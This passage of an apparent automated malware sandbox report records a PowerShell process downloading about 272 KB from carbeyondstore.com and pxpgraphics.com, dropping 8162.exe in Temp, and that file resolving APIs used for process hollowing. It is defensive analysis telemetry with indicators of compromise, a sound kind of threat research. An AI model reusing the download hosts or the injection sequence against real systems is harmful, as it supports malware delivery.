Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Fn
Read Value HKEY_CURRENT_USER\Environment False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell True 4
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 6
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 6
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 3
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 3
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds False 1
Fn
Process (6)
+
Operation Additional Information Success Count Logfile
Create C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe False 1
Fn
Create C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe True 1
Fn
Get Info True 1
Fn
Open c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Open c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Memory (38)
+
Operation Additional Information Success Count Logfile
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 3
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 2
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 3
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 17
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 2
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 2
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 2
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Get Info c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Module (7)
+
Operation Additional Information Success Count Logfile
Get Filename process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Get Filename True 1
Fn
Create Mapping filename = System Paging File, protection = PAGE_READWRITE True 1
Fn
Enumerate process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Map process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Unmap process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Unmap process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
COM (2)
+
Operation Additional Information Success Count Logfile
Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 1
Fn
Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
System (6)
+
Operation Additional Information Success Count Logfile
Mutex (10)
+
Operation Additional Information Success Count Logfile
Create mutex_name = Global\.net clr networking True 5
Fn
Open mutex_name = Global\.net clr networking True 5
Fn
Network Behavior
DNS (3)
+
Operation Additional Information Success Count Logfile
Resolve Name host = carbeyondstore.com, hints = [<transform_binlog_src.engine.transformer.os.windows.network.functions.fn_dns.AddrInfo object at 0x7f1a974fb9d0>] True 1
Fn
Resolve Name host = www.carbeyondstore.com, hints = [<transform_binlog_src.engine.transformer.os.windows.network.functions.fn_dns.AddrInfo object at 0x7f1a97470250>] True 1
Fn
Resolve Name host = pxpgraphics.com, hints = [<transform_binlog_src.engine.transformer.os.windows.network.functions.fn_dns.AddrInfo object at 0x7f1a9742c4d0>] True 1
Fn
TCP Sessions (3)
+
Information Value
Total Data Sent 0.00 KB (0 bytes)
Total Data Received 272.80 KB (279350 bytes)
Contacted Host Count 2
Contacted Hosts 72.52.246.64:80, 69.65.3.206:80
TCP Session #1
+
Information Value
Handle 0x54c
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 72.52.246.64
Remote Port 80
Local Address 0.0.0.0
Local Port 2496
Data Sent 0.00 KB (0 bytes)
Data Received 0.33 KB (340 bytes)
Operations
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 72.52.246.64, remote_port = 80 True 1
Fn
Receive flags = NO_FLAG_SET, size = 4096, size_out = 340 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #2
+
Information Value
Handle 0x548
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 72.52.246.64
Remote Port 80
Local Address 0.0.0.0
Local Port 2752
Data Sent 0.00 KB (0 bytes)
Data Received 0.57 KB (587 bytes)
Operations
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 72.52.246.64, remote_port = 80 True 1
Fn
Receive flags = NO_FLAG_SET, size = 4096, size_out = 587 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #3
+
Information Value
Handle 0x58c
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 69.65.3.206
Remote Port 80
Local Address 0.0.0.0
Local Port 3008
Data Sent 0.00 KB (0 bytes)
Data Received 271.90 KB (278423 bytes)
Operations
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 69.65.3.206, remote_port = 80 True 1
Fn
Receive flags = NO_FLAG_SET, size = 4096, size_out = 4096 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 3164 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 4356 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 1452 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 5808 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 1452 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 7260 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 2904 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 10164 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 2904 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 13068 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 1452 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 15972 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 4356 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 18876 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 2904 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 26136 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 8712 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 3472 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 6692 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 40656 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 1452 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 65536, size_out = 30492 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 60616, size_out = 24684 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 35932, size_out = 4356 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 31576, size_out = 27588 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3988, size_out = 3988 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 2, size_out = 2 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 3
Fn
Data
Receive flags = NO_FLAG_SET, size = 2, size_out = 2 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
Process #3: 8162.exe
(Host: 314, Network: 0)
+
Information Value
ID #3
File Name c:\users\hjrd1k~1\appdata\local\temp\8162.exe
Command Line "C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe"
Initial Working Directory C:\Users\hJrD1KOKY DS8lUjv\Desktop\
Monitor Start Time: 00:01:41, Reason: Child Process
Unmonitor End Time: 00:02:59, Reason: Terminated by Timeout
Monitor Duration 00:01:18
OS Process Information
+
Information Value
PID 0xba0
Parent PID 0xa94 (c:\windows\syswow64\windowspowershell\v1.0\powershell.exe)
File Name c:\users\hjrd1k~1\appdata\local\temp\8162.exe
Command Line "C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe"
Is Created or Modified Executable False
Integrity Level Medium
Username 1R6PFH\hJrD1KOKY DS8lUjv
Groups
  • 1R6PFH\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000e539 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False
private_0x00000000001a0000 0x001a0000 0x001a2fff Private Memory Readable, Writable True False False
private_0x00000000001a0000 0x001a0000 0x001a0fff Private Memory Readable, Writable True False False
private_0x00000000001e0000 0x001e0000 0x0025ffff Private Memory Readable, Writable True False False
private_0x00000000002a0000 0x002a0000 0x0039ffff Private Memory Readable, Writable True False False
locale.nls 0x003a0000 0x00406fff Memory Mapped File Readable False False False
private_0x00000000004d0000 0x004d0000 0x004dffff Private Memory Readable, Writable True False False
private_0x0000000000530000 0x00530000 0x0053ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000540000 0x00540000 0x006c7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000006d0000 0x006d0000 0x00850fff Pagefile Backed Memory Readable True False False
private_0x0000000000860000 0x00860000 0x009effff Private Memory Readable, Writable True False False
pagefile_0x0000000000860000 0x00860000 0x0093efff Pagefile Backed Memory Readable True False False
private_0x00000000009b0000 0x009b0000 0x009effff Private Memory Readable, Writable True False False
8162.exe 0x01100000 0x01147fff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000001150000 0x01150000 0x0254ffff Pagefile Backed Memory Readable True False False
wow64cpu.dll 0x73f80000 0x73f87fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x73f90000 0x73febfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x73ff0000 0x7402efff Memory Mapped File Readable, Writable, Executable False False False
dwmapi.dll 0x74c60000 0x74c72fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x75310000 0x7538ffff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x753a0000 0x753abfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x753b0000 0x7540ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x75630000 0x7568ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x756c0000 0x757cffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x757d0000 0x757e8fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75800000 0x75845fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75a50000 0x75adffff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75c60000 0x75d5ffff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75e80000 0x75f6ffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76fb0000 0x7707bfff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x77140000 0x771ebfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x77310000 0x773acfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x773b0000 0x7744ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000077450000 0x77450000 0x7756efff Private Memory Readable, Writable, Executable True False False
private_0x0000000077570000 0x77570000 0x77669fff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77670000 0x77818fff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x77820000 0x77829fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77850000 0x779cffff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Host Behavior
File (255)
+
Operation Filename Additional Information Success Count Logfile
Get Info STD_ERROR_HANDLE False 249
Fn
Get Info False 3
Fn
Open STD_INPUT_HANDLE True 1
Fn
Open STD_OUTPUT_HANDLE True 1
Fn
Open STD_ERROR_HANDLE True 1
Fn
Process (6)
+
Operation Additional Information Success Count Logfile
Create C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe True 1
Fn
Thread (1)
+
Operation Additional Information Success Count Logfile
Set Context c:\users\hjrd1k~1\appdata\local\temp\8162.exe True 1
Fn
Memory (10)
+
Operation Additional Information Success Count Logfile
Alloc c:\users\hjrd1k~1\appdata\local\temp\8162.exe True 1
Fn
Alloc c:\users\hjrd1k~1\appdata\local\temp\8162.exe True 1
Fn
Alloc C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe True 1
Fn
Free c:\users\hjrd1k~1\appdata\local\temp\8162.exe True 1
Fn
Read C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe True 1
Fn
Data
Write C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe True 1
Fn
Data
Write C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe True 1
Fn
Data
Write C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe True 1
Fn
Data
Write C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe True 1
Fn
Data
Write C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe True 1
Fn
Data
Module (40)
+
Operation Additional Information Success Count Logfile
Load module_name = kernel32, base_address = 1970012160 True 1
Fn
Load module_name = ntdll.dll, base_address = 2005204992 True 1
Fn
Get Handle module_name = c:\windows\syswow64\kernel32.dll True 3
Fn
Get Handle module_name = mscoree.dll False 1
Fn
Get Filename True 1
Fn
Get Filename True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 1970097963 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 1970082386 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 1970094600 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 1970091423 True 1
Fn
Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 1976368414 True 1
Fn
Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageExtraInfo, address_out = 1976167798 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WinExec, address_out = 1970613281 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 1970099142 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 1970082434 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 1970082832 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 1970081906 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetThreadContext, address_out = 1970239956 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 1970083926 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 1970198960 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 1970083950 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadProcessMemory, address_out = 1970196428 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 1970199008 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadContext, address_out = 1970623379 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ResumeThread, address_out = 1970095087 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 1970082102 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 1970082993 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 1970098593 True 1
Fn
Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtUnmapViewOfSection, address_out = 2005335152 True 1
Fn
Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtWriteVirtualMemory, address_out = 2005335556 True 1
Fn
Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExA, address_out = 1976032152 True 1
Fn
Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExA, address_out = 1976029742 True 1
Fn
Get Address module_name = c:\windows\syswow64\user32.dll, function = PostMessageA, address_out = 1976056746 True 1
Fn
Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageA, address_out = 1976007635 True 1
Fn
Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcA, address_out = 2005476576 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesA, address_out = 1970099220 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 1970081280 True 1
Fn
Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 1970619839 True 1
Fn
System (1)
+
Operation Additional Information Success Count Logfile
Process #4: 8162.exe
(Host: 49, Network: 0)
+
Information Value
ID #4
File Name c:\users\hjrd1k~1\appdata\local\temp\8162.exe
Command Line "C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe"
Initial Working Directory C:\Users\hJrD1KOKY DS8lUjv\Desktop\
Monitor Start Time: 00:01:44, Reason: Child Process
Unmonitor End Time: 00:02:59, Reason: Terminated by Timeout
Monitor Duration 00:01:15
OS Process Information
+
Information Value
PID 0xbb4
Parent PID 0xba0 (c:\users\hjrd1k~1\appdata\local\temp\8162.exe)
File Name c:\users\hjrd1k~1\appdata\local\temp\8162.exe
Command Line "C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe"
Is Created or Modified Executable False
Integrity Level Medium
Username 1R6PFH\hJrD1KOKY DS8lUjv
Groups
  • 1R6PFH\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000e539 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False
private_0x00000000001a0000 0x001a0000 0x0021ffff Private Memory Readable, Writable True False False
private_0x0000000000220000 0x00220000 0x0031ffff Private Memory Readable, Writable True False False
locale.nls 0x00320000 0x00386fff Memory Mapped File Readable False False False
private_0x0000000000400000 0x00400000 0x00419fff Private Memory Readable, Writable, Executable True False False
private_0x0000000000420000 0x00420000 0x004cffff Private Memory Readable, Writable True False False
private_0x00000000004e0000 0x004e0000 0x004effff Private Memory Readable, Writable True False False
pagefile_0x00000000004f0000 0x004f0000 0x00677fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000680000 0x00680000 0x00800fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000810000 0x00810000 0x008eefff Pagefile Backed Memory Readable True False False
8162.exe 0x01100000 0x01147fff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000001150000 0x01150000 0x0254ffff Pagefile Backed Memory Readable True False False
wow64cpu.dll 0x73f80000 0x73f87fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x73f90000 0x73febfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x73ff0000 0x7402efff Memory Mapped File Readable, Writable, Executable False False False
dwmapi.dll 0x74c60000 0x74c72fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x75310000 0x7538ffff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x753a0000 0x753abfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x753b0000 0x7540ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x75630000 0x7568ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x756c0000 0x757cffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x757d0000 0x757e8fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75800000 0x75845fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75a50000 0x75adffff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75c60000 0x75d5ffff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75e80000 0x75f6ffff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x761a0000 0x761f6fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x76200000 0x7635bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x76360000 0x76fa9fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76fb0000 0x7707bfff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x77140000 0x771ebfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x77310000 0x773acfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x773b0000 0x7744ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000077450000 0x77450000 0x7756efff Private Memory Readable, Writable, Executable True False False
private_0x0000000077570000 0x77570000 0x77669fff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77670000 0x77818fff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x77820000 0x77829fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77850000 0x779cffff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
